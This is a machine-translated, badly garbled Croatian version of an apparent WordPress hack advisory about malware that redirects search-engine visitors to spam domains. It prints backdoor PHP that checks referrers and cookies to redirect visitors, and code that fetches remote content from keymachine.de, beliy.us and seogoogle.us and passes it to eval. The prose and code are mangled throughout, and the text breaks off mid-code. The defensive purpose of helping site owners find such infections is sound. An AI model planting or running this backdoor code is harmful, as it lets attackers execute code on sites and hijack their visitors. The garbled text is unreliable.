WordPress Hack: Obnova i �kripac Google i Mehanizam za pretra�ivanje ili Nijedan Keks Promet Redirekcija to Tvoj-Needs.info, AnyResults.Net, Zlatan-Info.net i Ostali Ilegalan Polo�aj

Bilje�ka taj ne svi simptom svibanj dogoditi se ukupno. Ima mo�e biti vi�e od neki Metodije od hack bi�e, �to pridonijeti to razli�it na�i prema i mogu� rje�enje.

• Bilo koji klik preko from tra�enje motor kao �to je Google, Ehej, AOL, MSN, Windows �iv rezultati pretra�ivanja, uklju�uju�i blog ugled, htijenje biti redirekcija i �pediter to haker’ polo�aj kao �to je tvoj-needs.info, anyresults.net, zlatan-info.net, keymachine.de, beliy.us, seogoogle.us, sa rub siguran to rasti. Razglednik sti�i at haker stranica sa jednak niz za pretra�ivanje koju je on ili ona naviknut tra�enje in mehanizam za pretra�ivanje.
• Kliknite na povezati to blog na RSS hranjenje �ita� kao �to je Google �ita� mo�e biti redirekcija to haker polo�aj previ�e.
• posjetilac sa nema ra�una na blog, ili ne prijava ( stoga ne je keks otkriti mimo zloban kod), htijenje biti redirekcija to spam polo�aj.
• Jedini gostovanje from mehanizam za pretra�ivanje jesu bio redirekcija daleko, i izigrati uprava to proludirati se vjerojatno puno od bloggers, webmasteri i polo�aj posjedovanje, ili barem odgo�eno otkrivanje dana problem.
• Nenadan ogroman i dramati�no kap i izgubiti od masivan iznos od posjetilac promet i stranica pogled in tkanje metak sa svijetle�im tragom statistika, napose promet sa Google kao koji se odnosi na koga, �ak i da mehanizam za pretra�ivanje rezultat red je netaknut.
• Masiv kap od koji ogla�ava prihod from Google AdSense ili ostali oglasi mre�a, ili podru�nica komisija.
• Slijede�e temeljiti �ifriranje PHP kod svibanj pojaviti se na wp-blog-header.php varalica:

  <?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ kao $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==neistinit){ $ser1=”?;izbiti; }
ako && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”); izlaz; }? >

• predod�ba, �to je zapravo hrpa od zloban PHP kod, je dodani to wp- Sadr�aj/ upload imenik. Na primjer, wp- Sadr�aj/ upload/2008/06/06/abcdefghijklmn.jpg, ili Internet mo�e biti unutar va�e tema savija�, i.e. wp-contents/themes/classic/images/xyz.jpg. Ime dana predod�ba mo�e biti in oblik zapisa od xxxxxx_old.jpeg.
• ulaz je umetnuti in MySQL baza podataka za WordPress wp_options to ActiveX predod�ba ( zloban PHP kod) kao �ep, tipi�an kao rss_f541b3abd05e7962fcab37737f40fad8.
• Ima mo�e biti isto tako zloban kod, napose oni taj protuma�iti sa eval() ili base64_decode() naredba bio umetnuti u ostali WordPress PHP kartoteka. Primjer jesu slijede�e kod:

  ifisset_GET'p'(($[])) {
$dokoljenka = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ dokoljenka, ‘ dobiti http:/km20725.keymachine.de/ poslu�itelj/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ dokoljenka, ‘ doma�in: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ dokoljenka));
$izdovoljiti se = implode(”, $ izdovoljiti se);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ dokoljenka);}
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ poslu�itelj/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ poslu�itelj/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  evalgzinflatebase64_decode(((

• WordPress tema taj je bio aktivirati i iskori�ten mo�e biti ubrizgati sa sjeckanje kod i izvje�ta�en previ�e. Kao �to je kod normalno biti in header.php ili index.php dana tema, i ima crta sli�an to ispod

  ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(: